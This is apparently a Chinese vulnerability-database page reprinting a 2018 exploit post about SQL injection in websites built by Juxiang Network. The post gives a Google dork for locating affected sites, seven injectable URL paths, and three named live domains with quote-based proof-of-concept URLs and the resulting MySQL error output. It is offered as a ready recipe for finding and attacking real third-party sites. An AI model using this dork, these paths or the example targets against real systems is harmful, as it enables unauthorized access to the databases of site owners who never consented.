China Hangzhou City Technical Technology Support Juxiang Network 技术支持:聚翔网络 SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034915 漏洞类型
发布时间 2018-05-31 更新时间 2018-05-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018050311
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################

# Exploit Title :  China Hangzhou City Technical Technology Support Juxiang Network 技术支持:聚翔网络 SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 30/05/2018
# Vendor Homepages/Owners : dedaogame.com / radiantviewer.com / feesee.com / d58.net / linkedin.com/in/juxiang-jin-77131546 / shop1369760423327.1688.com
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89

#################################################################################################

# Google Dork :  intext:''技术支持:聚翔网络''

It means in English '' Technical Support Juxiang Network ''

# Exploit : /?id=[SQL Injection]

# Exploit : /en/list.php?id=[SQL Injection]

# Exploit : /en/img_anis.php?id=[SQL Injection]

# Exploit : /en/message.php?id=[SQL Injection]

# Exploit : /en/aboutus.php?id=[SQL Injection]

# Exploit : /contents.php?id=2&cid=[SQL Injection]

# Exploit : /message.php?id=[SQL Injection]

#################################################################################################

# Example Site =>  hzjkang.com/en/aboutus.php?id=1%27 => [ Proof of Concept for SQL Injection ] => archive.is/67pRx

# Example Site =>  atk-china.com/aboutus.php?id=1%27 => [ Proof of Concept for SQL Injection ] => archive.is/YtoHD

# Example Site =>  hszxrz.com/aboutus.php?id=1%27 => [ Proof of Concept for SQL Injection ] => archive.is/3GHK6

# Example SQL/DB Error appear on the page :  

PHPMyWind安全警告:MySql Error!
错误文件:/aboutus.php
错误信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 Error sql: SELECT * FROM `hzjx_infoclass` where id=1\'

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################